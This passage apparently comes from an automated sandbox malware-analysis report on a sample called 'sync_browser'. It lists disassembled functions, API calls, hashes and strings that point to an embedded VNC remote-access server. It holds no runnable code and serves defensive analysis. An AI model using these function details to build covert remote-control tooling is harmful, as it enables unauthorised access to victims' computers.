                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: ErrorLast$Current$CriticalSectionThread$Process$AllocDuplicateEnterExceptionHandleInitializeLeavePriorityRaiseReleaseSemaphoreValue
                                                                      • String ID:
                                                                      • API String ID: 772457954-0
                                                                      • Opcode ID: 6724cc30325cfb9ab06b351ea06354c6b11979decb25812fb5b84730cc05a7b3
                                                                      • Instruction ID: e9fc28b64ffc85f430df088c66dc08d83b0f58140881ac12edef19fa544bc859
                                                                      • Opcode Fuzzy Hash: 6724cc30325cfb9ab06b351ea06354c6b11979decb25812fb5b84730cc05a7b3
                                                                      • Instruction Fuzzy Hash: 70615E35A0874A86EB50BF25B464379A3A0FF44F84F941136DA4E83769EF3CE445C762
                                                                      Function 00007FF7E508F940 Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 183COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 483 7ff7e508f940-7ff7e508f979 484 7ff7e508f980-7ff7e508f9ab 483->484 485 7ff7e508f9b1-7ff7e508f9cc call 7ff7e5127c50 484->485 486 7ff7e508fb19-7ff7e508fb25 484->486 492 7ff7e508f9cf 485->492 487 7ff7e508fb29-7ff7e508fb42 call 7ff7e5127d30 486->487 493 7ff7e508fb50-7ff7e508fb69 call 7ff7e5127d30 487->493 494 7ff7e508fb44 487->494 495 7ff7e508f9d1-7ff7e508f9d3 492->495 497 7ff7e508fb49-7ff7e508fb4b 493->497 504 7ff7e508fb6b-7ff7e508fb95 call 7ff7e5128bbc 493->504 494->484 495->497 498 7ff7e508f9d9-7ff7e508f9e5 495->498 499 7ff7e508fc43-7ff7e508fc6d call 7ff7e5127220 497->499 501 7ff7e508fae6-7ff7e508fafc SleepEx 498->501 502 7ff7e508f9eb-7ff7e508f9f4 498->502 508 7ff7e508fb02-7ff7e508fb04 501->508 505 7ff7e508faaa 502->505 506 7ff7e508f9fa-7ff7e508fa02 502->506 504->497 518 7ff7e508fb97-7ff7e508fbf8 call 7ff7e5073730 504->518 509 7ff7e508faaf-7ff7e508fab8 call 7ff7e50dd1f0 505->509 506->505 511 7ff7e508fa08-7ff7e508fa0f 506->511 515 7ff7e508fb12-7ff7e508fb14 508->515 516 7ff7e508fb06-7ff7e508fb0d 508->516 522 7ff7e508fabd-7ff7e508fac8 509->522 513 7ff7e508fa11-7ff7e508fa34 511->513 514 7ff7e508fa39-7ff7e508fa44 511->514 519 7ff7e508faca-7ff7e508fadd call 7ff7e50dd890 513->519 520 7ff7e508fa46-7ff7e508fa5c 514->520 521 7ff7e508fa5e-7ff7e508fa9e EnterCriticalSection LeaveCriticalSection 514->521 515->495 516->492 532 7ff7e508fbfa-7ff7e508fc06 518->532 533 7ff7e508fc3e 518->533 527 7ff7e508fae2-7ff7e508fae4 519->527 529 7ff7e508faa4-7ff7e508faa8 520->529 521->529 522->501 522->519 527->487 527->501 529->509 532->533 534 7ff7e508fc08-7ff7e508fc1d 532->534 533->499 534->533 536 7ff7e508fc1f-7ff7e508fc2c 534->536 536->533 537 7ff7e508fc2e-7ff7e508fc3a 536->537 537->533
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: CriticalSection$EnterLeaveSleepsprintfswscanf
                                                                      • String ID: 0.0.0.0$REP$RFB$RFB %03d.%03d$false$i$true$vncclient.cpp : m_ms_logon set to %s
                                                                      • API String ID: 958158500-3765181313
                                                                      • Opcode ID: 1eb8a27b6a294cbb1bbf7568b07f20689580138f24bb599d5c02435dd9ce633d
                                                                      • Instruction ID: 4d82ccf73ffc87f58064dd6ec23c55a8609100980c58411820d37766352fee25
                                                                      • Opcode Fuzzy Hash: 1eb8a27b6a294cbb1bbf7568b07f20689580138f24bb599d5c02435dd9ce633d
                                                                      • Instruction Fuzzy Hash: EC91D226608B8A86E760EB35E468BAAB3A0FB44F94F840133EA4D87794DF3CD545C711
                                                                      Function 00007FF7E50D9D80 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 75COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Process$AddressCloseHandleLibraryOpenProc$CreateCurrentFirstFreeLoadMetricsProcess32SessionSnapshotSystemTokenToolhelp32
                                                                      • String ID: ?
                                                                      • API String ID: 2900023865-1684325040
                                                                      • Opcode ID: febb9543f439330e09f6a3bb3b030836e2934ac63594c7e2729f7f74b439011d
                                                                      • Instruction ID: 762007e4f65f378b637838f96f843408a8fbf8da31adedde7209c1f6ae744b00
                                                                      • Opcode Fuzzy Hash: febb9543f439330e09f6a3bb3b030836e2934ac63594c7e2729f7f74b439011d
                                                                      • Instruction Fuzzy Hash: 18313F3160CB8986E760AF21F45436AB3A4FB89B94F800036DA8D87B58EF3DD005CB51
                                                                      Function 00007FF7E50980DA Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 189libraryloaderCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: CreateRect$AddressLibraryLoadProcmalloc
                                                                      • String ID: SendInput$USER32$vncclient.cpp : TEST 4$vncclient.cpp : vncClient() executing...
                                                                      • API String ID: 1369618222-3178290357
                                                                      • Opcode ID: 59c5cb1e7166b4b1d70f07f65a41a2d60febf100e89283cd68553da4dcc8056f
                                                                      • Instruction ID: ed18af5ac9c42f339c539b7b4ba059c84537b5a7c5db15a08256d04a43403133
                                                                      • Opcode Fuzzy Hash: 59c5cb1e7166b4b1d70f07f65a41a2d60febf100e89283cd68553da4dcc8056f
                                                                      • Instruction Fuzzy Hash: 77B16932225BD096E348DF28EA543D9B7A8F740F44F54423AE3A847B91CF7A6076C751
                                                                      Function 00007FF7E5107B50 Relevance: 10.6, APIs: 7, Instructions: 81threadCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: ErrorLast$CriticalSectionThread$EnterExceptionLeavePriorityRaiseResume
                                                                      • String ID:
                                                                      • API String ID: 1366308849-0
                                                                      • Opcode ID: 63ef2765017d1710e1b3fde4549e7b5a362e36a6304331ef8a9692e50ded8925
                                                                      • Instruction ID: 93f6ffecab3a1f5453c082dfa02c71ab7874139792bdf2f96f688df18f9af782
                                                                      • Opcode Fuzzy Hash: 63ef2765017d1710e1b3fde4549e7b5a362e36a6304331ef8a9692e50ded8925
                                                                      • Instruction Fuzzy Hash: CF316F21A0864B86EB10BF24F464269B3A0FF85B58FA00537E65D826ADDF3CD449C722
                                                                      Function 00007FF7E50DCF90 Relevance: 9.1, APIs: 6, Instructions: 110networkCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: setsockopt$ConnectionIoctlStatsgetpeernamegetsockname
                                                                      • String ID:
                                                                      • API String ID: 2120259006-0
                                                                      • Opcode ID: c49f95ef961e3e379a6d047de3f2c4db0e5666ab8321b85981a4bd72149005e7
                                                                      • Instruction ID: 8549fee39abaf6c80638362f26966d2318529cb8534db75773041bc7bd242b9b
                                                                      • Opcode Fuzzy Hash: c49f95ef961e3e379a6d047de3f2c4db0e5666ab8321b85981a4bd72149005e7
                                                                      • Instruction Fuzzy Hash: 96514872204B85DED724DF30E4947E9B7A4FB4870CF404526EB5C87A48DB78D6A5CB60
                                                                      Function 00007FF7E513285C Relevance: 9.1, APIs: 6, Instructions: 63threadCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: CreateErrorLastThread_errno_getptd_invalid_parameter_noinfofree
                                                                      • String ID:
                                                                      • API String ID: 3283625137-0
                                                                      • Opcode ID: d7d1bbc1acb5388812442ca131e75b053374a14ef8d2c0d32f7c34c2cb7a35d3
                                                                      • Instruction ID: 222b324c80459bedcf2f724c01d433a893bf9aabc6358248f66c8596dc934009
                                                                      • Opcode Fuzzy Hash: d7d1bbc1acb5388812442ca131e75b053374a14ef8d2c0d32f7c34c2cb7a35d3
                                                                      • Instruction Fuzzy Hash: F7219221A0878986E614BB51B4613AAE290BF45F90FC54236EE6D83BDADF3CE051C716
                                                                      Function 00007FF7E5083FB0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 81libraryCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: ComputerLibraryLoadName
                                                                      • String ID: RICHED32.DLL$Rich Edit Dll Loading$Unable to load the Rich Edit (RICHED32.DLL) control!
                                                                      • API String ID: 2278097360-3189507618
                                                                      • Opcode ID: a0e48cd9bca1a580f90c0fe309f8f060cfac1904e258431fe3c2638ac3c22389
                                                                      • Instruction ID: 0170441b5e0f8f26bd586020826edf5fab81e3a00457284a359e63dd33675e3b
                                                                      • Opcode Fuzzy Hash: a0e48cd9bca1a580f90c0fe309f8f060cfac1904e258431fe3c2638ac3c22389
                                                                      • Instruction Fuzzy Hash: 5831BE21B09B4A81EB54FB2AF42432A7690EF85F58F444139D64E873E9EE3DC445C362
                                                                      Function 00007FF7E50DA320 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 39threadwindowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: ProcessWindow$CurrentFindMessagePostThread
                                                                      • String ID: WinVNC Tray Icon
                                                                      • API String ID: 2660421340-1071638575
                                                                      • Opcode ID: 559e961aba49f3495be4a1de55413b2cc06c1e4dbc84eeda83157a0626d0a607
                                                                      • Instruction ID: c5d8daad50093c94a8488c434d84ee2812b77b13543c17bd0f8250a0ba7b95e1
                                                                      • Opcode Fuzzy Hash: 559e961aba49f3495be4a1de55413b2cc06c1e4dbc84eeda83157a0626d0a607
                                                                      • Instruction Fuzzy Hash: 6C01A731608B8582E7146F52B854696F760FB48FD4F945036EE4D43B58EE7CD485C700
                                                                      Function 00007FF7E50933A0 Relevance: 7.6, APIs: 1, Strings: 4, Instructions: 85COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      • vncclient.cpp : A connection using DSM already exist - client rejected to avoid crash , xrefs: 00007FF7E5093490
                                                                      • vncclient.cpp : failed to set socket timeout(%d), xrefs: 00007FF7E50933D9
                                                                      • vncclient.cpp : DSMPlugin Pointer to socket OK, xrefs: 00007FF7E5093429
                                                                      • vncclient.cpp : Invalid DSMPlugin Pointer, xrefs: 00007FF7E5093502
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: ErrorLast
                                                                      • String ID: vncclient.cpp : A connection using DSM already exist - client rejected to avoid crash $vncclient.cpp : DSMPlugin Pointer to socket OK$vncclient.cpp : Invalid DSMPlugin Pointer$vncclient.cpp : failed to set socket timeout(%d)
                                                                      • API String ID: 1452528299-2001727811
                                                                      • Opcode ID: 4d081dc491a9ac6cbd13230380636544dfc8f183765b0f0986b9e0b49d768617
                                                                      • Instruction ID: d50f108c80a432c9e94cf9af96c84636c44e046e7d2da8dad9fdcd8e04a7cd16
                                                                      • Opcode Fuzzy Hash: 4d081dc491a9ac6cbd13230380636544dfc8f183765b0f0986b9e0b49d768617
                                                                      • Instruction Fuzzy Hash: 23410C66A05A89C5EB50AF2AD0943FD67A0FB84F44F994072DE0D877A4DF3DD489C322
                                                                      Function 00007FF7E50988A0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 68COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: CriticalSection$malloc$CreateEnterErrorInitializeLastLeaveSemaphoregetpeernameinet_ntoa
                                                                      • String ID: <unavailable>
                                                                      • API String ID: 4131039871-1096956887
                                                                      • Opcode ID: 662e7cd3472f8606c1dbc32a9fae7d2c30d9cf2075c004d535a59fbb274039f5
                                                                      • Instruction ID: d9beb526fbe4d358aa5c6c11df3c74c96f123bb7acab6aa50510f30a05d67fdd
                                                                      • Opcode Fuzzy Hash: 662e7cd3472f8606c1dbc32a9fae7d2c30d9cf2075c004d535a59fbb274039f5
                                                                      • Instruction Fuzzy Hash: 18319032604B8AC2EB50EF24F4643A9B3A0FB88B94F540136DA9D87798DF3CD454C751
                                                                      Function 00007FF7E50DCD40 Relevance: 6.1, APIs: 4, Instructions: 52networkCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: connectgethostbynamehtonsinet_addr
                                                                      • String ID:
                                                                      • API String ID: 599670773-0
